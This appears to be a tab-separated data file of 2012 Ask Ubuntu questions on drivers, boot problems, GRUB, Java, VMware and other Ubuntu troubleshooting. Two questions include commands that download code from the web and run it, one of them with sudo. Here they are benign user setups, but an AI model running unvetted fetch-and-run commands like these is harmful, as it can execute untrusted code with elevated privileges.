145144	how to solve bumblebee/nvidia optimus issues with kernel 3.4 ( works perfectly under 3.2 )	i installed ubuntu and could setup to utilize my intel hd 3000/geforce gt 540m hybrid graphics perfectly with the method described here : how well do laptops with nvidia optimus work ? everything works fine under kernel 3.2 . now i wanted to upgrade though to kernel 3.4 , as it brings many improvements , especially in saving battery life ( ie . intel rc6 ) ... at least from what i heard . while i had no issues installing the 3.4 kernel under ubuntu 12.04 and everything so far runs fine , bumblebee causes issues under kernel 3.4 . when trying to run commands like optirun , lsmod ( or similar kernel tools ) these just lock up and never return . the bumblebee developers seem to refuse to help with mainline kernels ( as seen here : https : //github.com/bumblebee-project/bbswitch/issues/17 ) . does anyone know , how to solve this issue ? could i solve this probably , by compiling the kernel and/or bumblebee against the kernels sources myself and having a ubuntu-like kernel ? any other idea that might help me to solve this myself , so i could profit from the 3.4 features and optimus , would be very appreciated .
145147	how do i share a printer ?	i want to share my printer on network via ubuntu if i want to connect my computer to printer via usb cable . what should i do ?
145150	ubuntu one directory location on windows	would it be appropriate to ask why ubuntu one for windows stopped using the home environment variable between v2 and v3 ? i 'm talking about software design philosophy , security considerations , why it 's such a high priority to deny us flexibility in setting up our ubuntu one sync directory the way we want , etc . not a support question , just curious . i 'm not looking for opinions or speculation , i have those already -- just the software design philosophy for that sort of decision . i was using home as a way to fool ubuntu one into using a directory on a more appropriate drive than userprofile , and that 's not working in v3 . i could point out that microsoft provides a very easy way to change the location of my documents so it is outside of the userprofile , e.g . on drive d : , and when this happens ubuntu one is unable to monitor any folders there . this means that one of the directory trees on windows that the user is by design allowed to use is being denied by ubuntu one , so an answer like `` best practice says userprofile is the best place for the user to put files '' is incorrect , at least when `` my documents '' is somewhere else .
145151	installing 32 bit sun java on 64 bit ubuntu 12.04 system	i 'm accessing a web site that seems to require 32 bit sun java ( juniper net connect and business objects ) . i can install firefox 32 bit and icedtea 32 bit which works for juniper . sudo apt-get remove firefox openjdk-6-jdk icedtea-6-plugin sudo apt-get install firefox : i386 openjdk-6-jdk : i386 icedtea-6-plugin : i386 unfortunately , business objects is still failing . i can install sun-java6 as below : cd ~/ wget https : //github.com/flexiondotorg/oab-java6/raw/0.2.3/oab-java.sh -o oab-java.sh chmod +x oab-java.sh sudo ./oab-java.sh this work well , however , this does n't seem to make the i386 version available . sudo apt-get install sun-java6-jre will install the 64 bit version , but sudo apt-get install sun-java6-jre : i386 fails . am i missing something ? thanks in advance for any pointers .
145152	how to move the lock window on the lock-screen ?	is it possible to move the window where you input your password on the lock screen away from the center , e.g . at the lower edge ?
145153	failure to boot after suspending	i have two issues with ubuntu 12.04 ( upgraded from 11.04 , 11.10 ) on my asus k52de laptop . first issue : booting fails , if it follows a suspension , then a wake-up and finally a shut down . if i realize this sequence , then , during the boot i see the asus logo and after that i see only a blinking cursor instead of grub2 . then i have to recover grub2 . second issue : sometimes , my laptop does n't shut down . it freezes on the ubuntu logo and i must turn it down with power buttom . thank you .
145154	software center is stuck for dropbox `` applying changes ''	i wanted to download and install dropbox , but it has been stuck `` applying changes '' for almost an hour . i 'm new to ubuntu so i 'm not sure how to cancel or restart itâś thanks !
145155	modify u/k live cd	i 'd like modify kubuntu 12.04 live cd/usb ( chance name system kubuntu for kwes dos ) chance image iso linux & splash image ( kde loging in ) for a image plymouth etc . etc . tell me how ! please
145157	does the software center log installations ?	does the ubuntu software center keep a log of everything it has installed ? so i could just parse this log to convert it into a script full of 'sudo apt-get instals ' or something . and then the next time i install ubuntu i could just this script to re-install everything .
145161	how do i safely uninstall unused ubuntu installs	im trying to clean up my drive as i 've got some duplicates of 11.10 installed . my original install was messed up so i reinstalled ( foolishly thinking it would just write over the original ) . i lived with it for a while before deciding to delete the partition to use the space as a storage for files i also want in windows ( its a dual boot ) . after deleting the partition and updating grub ( grub said everything was fine ) . i rebooted , only to be faced with grub rescue . after another install i 've still got two ubuntu 's . someone please help ... .
145163	how do i get rythymbox music player to omit the oracle java jdk binary from the playlists ?	rythymbox music player finds the oracle java jdk compressed file , which is a .bin and automatically puts it in a playlist . if you delete the item from rythymbox the file system is modified in that the jdk gets deleted . this is very annoying because then i have to download the jdk again in order to keep it handy for server deployments . i want to omit the jdk from the playlist but i want to keep the file . how do i prevent this file from showing up in the playlist ? edit note that the playlist is not merely a view of what can potentially be played . if you delete the file from the playlist , the file actually gets deleted from the file system which might not be what you want .
145165	how to install webmin ?	how do i install webmin on ubuntu 12.04 ? note : i am using the desktop edition , not ubuntu server .
145168	my browsers in ubuntu redirect my saved web pages into google.com automatically	i have saved a web page as index.html . its dependent files also has been saved automatically . when i try to open my saved web page in any browser , the browser automatically redirects the html file path into google.com and does not open my file . my file address is /home/bignet/documents/index.html thank you .
145172	error opening .wmv file	i tried to open a .wmv file in thunderbird . i was asked to download files in order to have it accessible . at the end of the installation an error occurred - location not found . error message displayed with just the ok button available . now when i press the play button just the error message displays so i am not sure which packages need to be installed/uninstalled . i have installed ubuntu 12.04 ( 32-bit ) with open-jdk-7 . error was generated when installing : gstreamer ffmpeg video plugin it seemed that it took a while to have the process completing all steps of the download / install before the error message displayed .
145184	how can i run my java application at/after boot ?	hi all i am brand new to all of this so please bear with me . i have created this bash file as follows : rm /home/ubuntu/test.jar wget http : //mywebsite.com/test.jar java -jar test.jar now i have placed that file in many various places , run some update thing , and also even made a cron job with the @ reboot function . no matter what , the java program is never actually started . now , this is an amazon web services headless ubuntu server with no gui , only ssh access so i 've got ta do it via command line , and have it run as a daemon of some sort . i appreciate any help !
145185	how to disable the `` roll up '' / `` shade '' keyboard shortcut in gnome 3 ( after upgrading to 12.04 ) ?	i am using gnome 3 . after upgrading from 11.10 to 12.04 , `` ctrl-alt-s '' was reclaimed for use in toggling the shaded state of a window . i have checked the following places , and i have n't been able to find any instance of a keybinding set for toggling the shaded state . system settings / hardware / keyboard / shortcuts ( as per how do i disable ctrl+alt+s to minimize a window ? ) i even tried setting a different shortcut . made no difference . dconf-editor ( now deprecated , from what i 've found ) gconf-editor/gsettings what am i missing ?
145186	how can i reduce lagging with gui/gpu stuff -- make unity run smaller , quicker , faster ?	finally installed ubuntu 12.04 on my hp pavilion 2000 . have all of my apps on and loaded and am happy thus far . one issue -- i 'm experiencing a small amount of gui/gpu style lagging when i go to open menus , move windows , etc . what settings can i disable to allow it to run sharply and quickly , even if i t means sacrificing some of the graphics ? have already installed pre-load . just want the os to run sharply and quickly with menu refreshes , window moves , etc . i do not mind sacrificing graphics . somone mentionted to me i have to install video drivers but the two that come up in system settings under drivers it wo n't let me install . also : i am driving a second 19 '' monitor -- would that make a difference performance wise as well ? thanks in advance . chris
145192	what is the process for software to be updated in the ubuntu software center ?	i frequently find versions of software in the ubuntu software center lag behind stable versions available direct from developers . why does the ubuntu software center not offer the latest and greatest stable release of software as soon as it is made available to the linux community ?
145195	nvidia driver problem after updating to 12.04	as the title says i have problems with the driver after updating to 12.04 . the gui doesnt start anymore , i only see the terminal . i have googled this for a couple of days now and have tried different things like running commands for update , upgrade and tried to uninstall and re-install the nvidia-drivers but with no success . no matter what i do i get this message : '' error : api mismatch : the nvidia kernel module has version 295.40 , but this nvidia driver component has version 295.49 . please make sure that the kernel and all nvidia driver components has the same version . '' is there anyway i can fix this from the terminal ?
145196	has anyone got the mist engine to work on gtk3 ?	i 've just upgraded my xubuntu installation to precise and run into gtk3 theme problems - my theme based on the mist engine does n't work for gtk3 apps . there 's a package gtk3-engines in the gnome ppa that includes mist , has anyone got this to work ? it has a themes/mist/gtk3.0 folder with a gtkrc file but it does n't seem to work for me . even if someone just has an idea where i could find more help on this i 'd be grateful ( is there even any documentation on making themes in gtk3 ? )
145197	will unity 2d make performance quicker than regular unity ?	i 'm just looking for a way to speed up overall quickness around the os . i 'm on a fairly new hp box so it should n't lag as much as it does . also , is there anything lighter than unity 2d that i can use ?
145200	amnesia does n't start due to audio problems	i have a problem with amnesia game . after intro and clicking continue button few times , when game is supposed to start it crashes . here is console output : alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:1018 : ( snd_pcm_dmix_open ) unable to open slave can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started i should mention i have integrated both graphic and sound card .
145201	starting a user-space program as non-root user at boot with upstart	is there a method to set up an upstart script to execute a user-space program without keeping root privileges , but so the user which has directory/permissions-based ownership of the program can stop/start while still having the program start at boot time ?
145204	new hd - ca n't get usb boot working to install ubuntu	here 's my setup : -windows 7 ( legit ) - acer revo nettop ( it 's my htpc ) -hard drive is failing - followed this article : http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows - when i take out the dying drive , insert the new drive , turn on computer with newly created bootable usb drive it starts up and then just sits on : syslinux copyright 1997-2008 some guy blah blah _ ( blinking cursor ) what am i doing wrong ? all i want to do is get ubuntu onto a brand new hard drive .
145205	installing windows 8 in ubuntu	i have a little issue , i got myself a little zotac nano xs pc and i installed ubuntu on it . now what i would like to do is to give a try with windows 8 w/o having to make an usb bootable or anything like that . is there a way to install windows once ubuntu is on the machine ?
145215	usb boot with no windows ?	i fried my computer trying to load alpine linux . now i ca n't do anything . i have ubuntu . iso on a usb , is that all i need ? how do i run it from boot : prompt ? i think i formatted my drive and deleted my windows recovery disc too !
145228	audio / video options disabled in pidgin when using yahoo voice video	please help me rightly configure my pidgin to enable yahoo voice/video . pidgin version 2.10.3 conversation > media > audio / video options are disabled : (
145235	when i launch ubuntu it just has a purple screen ?	it goes to a purple screen then black , and does n't do anything . i am using 12.04 wubi on my laptop . i 'm new to ubuntu so i do n't know what to do
145241	how do i run update-grub from a livecd ?	okay , so i did something stupid . i was trying to clean up my grub entries , and accidentally removed all of my linux kernels from grub ( they 're still on the hard drive ) . so now , obviously , grub does n't give me any way to boot into ubuntu ; i can boot into windows just fine , but ubuntu is n't even listed . so i just want to run `` sudo upgrade-grub '' somehow to restore ubuntu to the list . i can boot from a livecd , but once there how do i run that command ? ( my ubuntu installation is on sda5 , by the way . )
145243	where did `` open with '' ( user defined command ) go ?	i 'm now using ubuntu 12.04 . in earlier versions you could associate a filetype with a specific command ( e.g . self-compiled binary ) by selecting `` open with '' in the file 's properties and select the command by providing the file path manually if it was n't already in the list of applications . is this possibility gone ? the only way i found now is to create .desktop files and edit the mimetypes via an text editor .
145245	does gnome 3.4 perform better when using 64-bit ubuntu than when using 32-bit ubuntu ?	so i stupidly downloaded the 64-bit amd version and installed it on my system . everything worked flawlessly . but my friend suggested it was n't the supported version for my system since i 'm running a dell xps 17 with i5 . so i installed the 32-bit version and , initially , all went smoother and faster than with the 64-bit version . but once i installed gnome 3.4 my life got a bit harder . i got system errors , my drivers from nvidia were n't supported , etc . i followed online advice , but it did n't help . my question is if it is possible that the 64-bit amd version is better for my system ?
145256	accomplishment viewer not displaying ask ubuntu badges	i 've downloaded the new ubuntu accomplishment viewer . i 've read and seen pictures of the program combining with au badges . however , mine does n't show anything other than the initial trophies . i 've set up my identity with my launcpad email , and i 've gone to file/check accomplishments and it still does n't show any of the au items . is there something extra i have to do to get this program to work with au ?
145259	how can i determine which version of ffmpeg comes by default ?	i am honestly confused beyond belief about my package that i have installed for ffmpeg . it is , according to synaptic , version : 4:0.8.1-1really0u1 for some reason , i feel like this is not the version that would come in the repositories and i feel like another ppa that i may have used installed a wrong version . i believe it was the vlc ppa for nightly builds . can anyone who does not have this ppa on their system tell me what version of ffmpeg they are running ?
145260	external links opening in the non-default browser	i have set firefox as default web application in ubuntu , but external links ( like clicking a link in pidgin ) still get opened with opera . does anyone have a clue on how to fix this ? thanks .
145262	how do i return a purchase from the ubuntu software centre ?	i purchased amnesia ( game ) from the ubuntu software centre . it crashes on startup every time and i therefore want to return it for a refund . i ca n't find a way of doing so through the usc and , strangely , i ca n't find any trace of this having been asked before ( maybe bad googling on my part ) . so the question is : how do i return a purchase and get a refund through the usc ? edit installing proprietary driver for amd catalyst fixed amnesia , but i still think this is an important question because it 's basic customer service for any purchase . i 'd therefore appreciate any answers anyone can find and i will continue to look too . if i find the answer i 'll post it here .
145271	how do i get a zte wcdma modem working ?	i just installed ubuntu server 12.04 . the server detects the modem , but i ca n't edit mobile broadband settings ( to input username and password ) in network connections
145274	slow boot time since upgrade to 12.04 from 11.10	i have tried for quite a while now to reduce my boot time , disabled some startup items , removed packages that were causing crashes after boot , removed ureadahead pack files , reinstalled ureadahead , uninstalled ureadahead and installed e4rat ... .and nothing has made that much difference . e4rat made the biggest difference with a reduction of a few seconds but my boot time is still around 80 seconds . can anyone help ? dmesg and bootchart below : [ 2.156198 ] usb 1-2.3 : new full-speed usb device number 3 using ehci_hcd [ 2.248892 ] hub 1-2.3:1.0 : usb hub found [ 2.249051 ] hub 1-2.3:1.0 : 3 ports detected [ 2.336222 ] usb 1-2.4 : new full-speed usb device number 4 using ehci_hcd [ 2.506968 ] [ drm ] initialized overlay support [ 2.556224 ] usb 1-2.3.2 : new full-speed usb device number 5 using ehci_hcd [ 2.703484 ] fbcon : inteldrmfb ( fb0 ) is primary device [ 2.703601 ] console : switching to colour frame buffer device 160x50 [ 2.703677 ] fb0 : inteldrmfb frame buffer device [ 2.703681 ] drm : registered panic notifier [ 2.703712 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 3.606304 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 28.036880 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 28.049443 ] init : bootchart pre-stop process ( 483 ) terminated with status 1 [ 28.050216 ] init : bootchart main process ( 475 ) killed by term signal [ 28.065200 ] udevd [ 488 ] : starting version 175 [ 28.133129 ] lp : driver loaded but no devices found [ 28.226043 ] adding 1250300k swap on /dev/sda6 . priority : -1 extents:1 across:1250300k [ 28.281691 ] intel_rng : fwh not detected [ 28.282808 ] cfg80211 : calling crda to update world regulatory domain [ 28.309624 ] leds_ss4200 : no led devices found [ 28.315511 ] iwl3945 : intel ( r ) pro/wireless 3945abg/bg network connection driver for linux , in-tree : s [ 28.315516 ] iwl3945 : copyright ( c ) 2003-2011 intel corporation [ 28.315592 ] iwl3945 0000:0c:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 28.315608 ] iwl3945 0000:0c:00.0 : setting latency timer to 64 [ 28.418819 ] iwl3945 0000:0c:00.0 : tunable channels : 13 802.11bg , 23 802.11a channels [ 28.418824 ] iwl3945 0000:0c:00.0 : detected intel wireless wifi link 3945abg [ 28.419084 ] iwl3945 0000:0c:00.0 : irq 43 for msi/msi-x [ 28.422059 ] registered led device : phy0-led [ 28.422103 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 28.446514 ] ieee80211 phy0 : selected rate control algorithm 'iwl-3945-rs' [ 28.464570 ] dcdbas dcdbas : dell systems management base driver ( version 5.6.0-3.2 ) [ 28.471575 ] yenta_cardbus 0000:03:01.0 : cardbus bridge found [ 1028:01c2 ] [ 28.471602 ] yenta_cardbus 0000:03:01.0 : o2 : enabling read prefetch/write burst . if you experience problems or performance issues , use the yenta_socket parameter 'o2_speedup=off' [ 28.496643 ] snd_hda_intel 0000:00:1b.0 : pci int a - > gsi 21 ( level , low ) - > irq 21 [ 28.496710 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 28.496746 ] snd_hda_intel 0000:00:1b.0 : setting latency timer to 64 [ 28.573257 ] input : hda intel mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input5 [ 28.573373 ] input : hda intel headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input6 [ 28.597084 ] yenta_cardbus 0000:03:01.0 : isa irq mask 0x0cb8 , pci irq 18 [ 28.597091 ] yenta_cardbus 0000:03:01.0 : socket status : 30000006 [ 28.597096 ] pci_bus 0000:03 : raising subordinate bus # of parent bus ( # 03 ) from # 04 to # 07 [ 28.597379 ] yenta_cardbus 0000:03:01.0 : pcmcia : parent pci bridge window : [ io 0x2000-0x2fff ] [ 28.597384 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x2000-0x2fff : excluding 0x2000-0x20ff [ 28.602146 ] type=1400 audit ( 1336601911.623:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=674 comm= '' apparmor_parser '' [ 28.602161 ] type=1400 audit ( 1336601911.623:3 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=746 comm= '' apparmor_parser '' [ 28.602728 ] type=1400 audit ( 1336601911.623:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=674 comm= '' apparmor_parser '' [ 28.602758 ] type=1400 audit ( 1336601911.623:5 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=746 comm= '' apparmor_parser '' [ 28.603064 ] type=1400 audit ( 1336601911.623:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=674 comm= '' apparmor_parser '' [ 28.603099 ] type=1400 audit ( 1336601911.623:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=746 comm= '' apparmor_parser '' [ 28.608611 ] 0x2400-0x24ff [ 28.613044 ] yenta_cardbus 0000:03:01.0 : pcmcia : parent pci bridge window : [ mem 0xe0000000-0xe3ffffff ] [ 28.613050 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0xe0000000-0xe3ffffff : excluding 0xe0000000-0xe03fffff [ 28.613066 ] yenta_cardbus 0000:03:01.0 : pcmcia : parent pci bridge window : [ mem 0xe4000000-0xe7ffffff pref ] [ 28.613070 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0xe4000000-0xe7ffffff : excluding 0xe4000000-0xe7ffffff [ 28.641184 ] input : dell wmi hotkeys as /devices/virtual/input/input7 [ 28.671195 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 28.671202 ] cfg80211 : world regulatory domain updated : [ 28.671204 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 28.671208 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.671212 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.671216 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.671219 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.671223 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 28.722883 ] bluetooth : core ver 2.16 [ 28.722907 ] net : registered protocol family 31 [ 28.722910 ] bluetooth : hci device and connection manager initialized [ 28.722914 ] bluetooth : hci socket layer initialized [ 28.722916 ] bluetooth : l2cap socket layer initialized [ 28.722923 ] bluetooth : sco socket layer initialized [ 28.723278 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 28.745314 ] init : bootchart post-stop process ( 484 ) terminated with status 2 [ 28.745922 ] usbcore : registered new interface driver btusb [ 28.836341 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x100-0x3af : excluding 0x170-0x177 0x1f0-0x1f7 0x370-0x377 [ 28.838578 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x3e0-0x4ff : excluding 0x3f0-0x3ff 0x4d0-0x4d7 [ 28.839342 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0x820-0x8ff : clean . [ 28.840025 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0xc00-0xcf7 : excluding 0xc80-0xcbf [ 28.840587 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0x0c0000-0x0fffff : excluding 0xc0000-0xcffff 0xe0000-0xfffff [ 28.840628 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0xa0000000-0xa0ffffff : excluding 0xa0000000-0xa0ffffff [ 28.840666 ] pcmcia_socket pcmcia_socket0 : cs : memory probe 0x60000000-0x60ffffff : excluding 0x60000000-0x60ffffff [ 28.840704 ] pcmcia_socket pcmcia_socket0 : cs : io port probe 0xa00-0xaff : clean . [ 29.364319 ] input : dualpoint stick as /devices/platform/i8042/serio1/input/input8 [ 29.384676 ] input : alpsps/2 alps dualpoint touchpad as /devices/platform/i8042/serio1/input/input9 [ 29.431991 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , user_xattr [ 29.692514 ] init : failsafe main process ( 920 ) killed by term signal [ 29.793891 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 29.793895 ] bluetooth : bnep filters : protocol multicast [ 29.812100 ] bluetooth : rfcomm tty layer initialized [ 29.812107 ] bluetooth : rfcomm socket layer initialized [ 29.812110 ] bluetooth : rfcomm ver 1.11 [ 29.817985 ] ppdev : user-space parallel port driver [ 29.846554 ] usb 1-2.4 : usb disconnect , device number 4 [ 29.846927 ] bluetooth : hci0 urb ef1a9e00 submission failed [ 29.864228 ] type=1400 audit ( 1336601912.887:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=1030 comm= '' apparmor_parser '' [ 29.869792 ] type=1400 audit ( 1336601912.891:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1028 comm= '' apparmor_parser '' [ 29.872809 ] type=1400 audit ( 1336601912.895:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=1028 comm= '' apparmor_parser '' [ 29.876653 ] type=1400 audit ( 1336601912.899:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1031 comm= '' apparmor_parser '' [ 30.058346 ] iwl3945 0000:0c:00.0 : loaded firmware version 15.32.2.9 [ 30.155088 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 30.155428 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 30.158293 ] tg3 0000:09:00.0 : irq 45 for msi/msi-x [ 30.196049 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 30.197106 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 30.296754 ] init : gdm main process ( 1171 ) killed by term signal bootchart it seems to be getting worse over time , maybe with each successive boot .
145275	screen problem with 12.04 install on a hp dv9000	i installed 12.04 on a hp dv9000 laptop . i first tried to install with a windows partition ; then tried to install and move files from windows but not have a dual boot ; then tried to install and have 12.04 have the system all to itself . the install was done off a burned cd ... all went well . on reboot - it takes a while to come up to the user id and password challenge . after providing input , screen renders and then turns black . first time ubuntu user/installer - not technical : - ) ... thanks for any help ... i 'll keep on digging in parallel .
145285	ca n't access an ext4 partition in a external hd	i have a 1tb external hd that i partitioned into a fat32 partition and an ext4 partition . apparently the file system of the ext4 is damaged and i can not access it . the disk utility on the drive looks like this : i though i could use this answer : external hard drive wo n't mount - how to troubleshoot ? , but as you can see , for some reason i do not have the option to check the partition . btw , formatting is not an option for me if there is a way to recover most of the files . output of mount : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/rafael/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=rafael ) /dev/sdb2 on /media/win32 type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) output of more /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=f27f4656-379e-4500-af22-ec76b871b657 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=294dddf0-2c87-4339-8f16-b0028a6ec232 none swap sw 0 0
145291	remote connection using rdp protocol failure connecting to 12.04	new install of 12.04 64 bit installed vnc4server and xrdp trying to connect remotely to it using rdp protocol just getting blank screen with my desktop background then dialog box saying /usr/bin/compiz `` the application has closed unexpectently '' what can i try to allow me to access my desktop ?
145292	applications will not open	since upgrading to ubuntu 12.04 in april , several applications will not open . pithos , pidgin , rhythmbox , movieplayer and soundjuicer are installed but will not open , either from the launcher or from the dashboard . the icons for the applications appear normally on the launcher . when i click on the icon , the icon will blink as if the app is starting to open , then nothing happens . nothing happens when i click the app from the dashboard . i have done all the ubuntu updates . i have removed and re installed the apps several times with no improvement . the majority of my apps including chrome , thunderbird , and vlc will open normally . vlc will play sound and video fine . sound and video play fine from utube . these same apps worked fine with my previous version of ubuntu .
145295	vmware kernel modules will not compile or update on ubuntu 12.04	kernel module update was required when opening vmware client ( vmplayer ) then following error occurs . any idea would be appreciated . unable to start services . see log file /tmp/vmware-root/setup-nnn.log for details ( note : nnn looks like random numbers ) on gui that show progress of updating , `` virtual netowork device '' show red flag appears . content of .log file is here : http : //pastebin.com/wekt5uhf this page suggests installing linux-headers-generic and build-essential , which are already installed on mine ( thus no good ) . this could be 1st execution of vmplayer on my machine since i upgraded to ubuntu 12.04 from 11.10 . environment : vmware player 4.0.3 build-703057
145299	login takes long time	i am using ubuntu 12.04 from past 12 days . in the beginning login was fast enough after i put the password it hardly takes 3 to 4 sec to enter in desktop , but now its taking like more that 40 sec to show desktop after entering password . whats the problem , is there any solution ? p.s there is only two programs ( psensor and jupiter ) that starts automatically after login . boot.log fsck from util-linux 2.20.1 /dev/sda6 : clean , 254544/3325952 files , 2133831/13285632 blocks * stopping userspace bootsplash [ 164g [ ok ] * stopping flush boot log to disk [ 164g [ ok ] * starting mdns/dns-sd daemon [ 164g [ ok ] skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd skipping profile in /etc/apparmor.d/disable : usr.bin.firefox * starting bluetooth daemon [ 164g [ ok ] * starting network connection manager [ 164g [ ok ] * starting apparmor profiles [ 170g [ 164g [ ok ] * stopping system v initialisation compatibility [ 164g [ ok ] * starting cups printing spooler/server [ 164g [ ok ] * starting system v runlevel compatibility [ 164g [ ok ] * starting bumblebee supporting nvidia optimus cards [ 164g [ ok ] * starting lightdm display manager [ 164g [ ok ] * starting save kernel messages [ 164g [ ok ] * starting anac ( h ) ronistic cron [ 164g [ ok ] * starting acpi daemon [ 164g [ ok ] * starting regular background program processing daemon [ 164g [ ok ] * starting deferred execution scheduler [ 164g [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher * starting cpu interrupts balancing daemon [ 164g [ ok ]
145304	do the logs such as messages and syslog begin after installation ?	i would like to know if logs such as syslog and messages begin their first loggings during the installation of the os , or once the os has already been installed and the first normal boot-up ?
145306	search for a string recursively whilst in current directory	i want to search all files recursively from the directory i am in for a particular string . i tried grep -r -i my_string and i tried it in a test folder with two tiny files but it wouldnt find the string could someone please help ? also , is there any special way of defining `` contains '' rather than matching the whole word ?
145308	how do i set up my online accounts ?	it used to be found in the system settings in 11.10 but i guess it 's been replaced by privacy in 12.04 . i tried to set it up by using the contacts app but i accidentally closed the option to add my online accounts and now it 's gone . i 've tried uninstalling contacts and then doing a clean up with ubuntu tweak but that does n't seem to have done anything . how can i set up my online acounts ?
